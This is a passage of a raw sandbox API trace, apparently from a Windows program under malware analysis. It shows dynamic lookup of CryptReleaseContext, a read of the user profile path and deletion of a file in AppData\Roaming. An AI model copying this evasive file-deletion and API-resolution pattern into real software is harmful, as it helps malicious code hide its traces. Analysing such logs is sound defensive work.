dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0223.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0223.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0223.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0223.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0223.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0223.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0223.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0223.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0223.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0223.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0223.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0223.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0223.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0223.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0223.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0223.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0223.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0223.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0223.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0223.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0223.993] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0223.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0223.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0223.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d58 [0223.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0223.993] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0223.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0223.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0223.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0223.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0223.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0223.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0223.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0223.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0223.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0223.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0223.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0223.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0223.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0223.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0223.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0223.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0223.994] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0223.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0223.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0223.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0223.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0223.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0223.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0223.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0223.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0223.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0223.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0223.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0223.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0223.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0223.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0223.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0223.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0223.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0223.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0223.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0223.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0223.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0223.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0223.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0223.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0223.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0223.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0223.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0223.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0223.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0223.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0223.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69928, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0223.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0223.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0223.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0223.996] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0223.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0223.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0223.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0223.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0223.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0223.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0223.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0223.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0223.996] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0223.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0223.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d28 [0223.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0223.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0223.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0223.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0223.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0223.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0223.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0223.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0223.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0223.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0223.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0223.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0223.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0223.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0223.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0223.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0223.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0223.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0223.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0223.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0223.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0223.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0223.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0223.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0223.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0223.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0223.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0223.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0223.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0223.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0223.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0223.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0223.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0223.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0223.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0223.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0223.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0223.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0223.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0223.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0223.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0223.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0223.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0223.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0223.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0223.998] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0223.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0223.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0223.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041c0 [0223.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0223.998] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0223.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0223.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0223.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50db8 [0223.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0223.998] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0223.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0223.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0223.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0223.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0223.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0223.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0223.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0223.998] FreeLibrary (hLibModule=0x756e0000) returned 1 [0223.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0223.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0223.998] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0223.998] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0223.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0223.999] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0223.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0223.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0223.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0223.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0223.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0223.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0223.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0223.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0223.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f80 [0223.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d40 [0223.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50db8 [0223.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0223.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0223.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0223.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0223.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e48 [0223.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0223.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0223.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0223.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0223.999] CloseHandle (hObject=0x2a0) returned 1 [0223.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0223.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0224.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0dd0 | out: hHeap=0x970000) returned 1 [0224.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0224.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0224.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0224.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0224.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0224.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0224.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0224.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0224.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0224.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0224.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0224.001] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0224.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0224.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0224.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0224.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0224.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0224.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0224.002] CloseHandle (hObject=0x2d0) returned 1 [0224.005] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0224.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0224.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0224.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0224.006] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0224.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0224.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0224.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0224.006] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0224.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0224.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0224.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0224.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0224.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0224.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0224.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0224.006] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/ATHv.mp4", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\ATHv.mp4", lpFilePart=0x8cedf4*="ATHv.mp4") returned 0x28 [0224.006] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\ATHv.mp4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\athv.mp4")) returned 0x20 [0224.007] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\ATHv.mp4", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9a0ef00, ftCreationTime.dwHighDateTime=0x1d5e235, ftLastAccessTime.dwLowDateTime=0x2673a800, ftLastAccessTime.dwHighDateTime=0x1d5e11e, ftLastWriteTime.dwLowDateTime=0x2673a800, ftLastWriteTime.dwHighDateTime=0x1d5e11e, nFileSizeHigh=0x0, nFileSizeLow=0x3f24, dwReserved0=0x1, dwReserved1=0x1c, cFileName="ATHv.mp4", cAlternateFileName="")) returned 0xa87050 [0224.007] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\ATHv.mp4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\athv.mp4")) returned 1 [0224.185] FindNextFileW (in: hFindFile=0xa87050, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9a0ef00, ftCreationTime.dwHighDateTime=0x1d5e235, ftLastAccessTime.dwLowDateTime=0x2673a800, ftLastAccessTime.dwHighDateTime=0x1d5e11e, ftLastWriteTime.dwLowDateTime=0x2673a800, 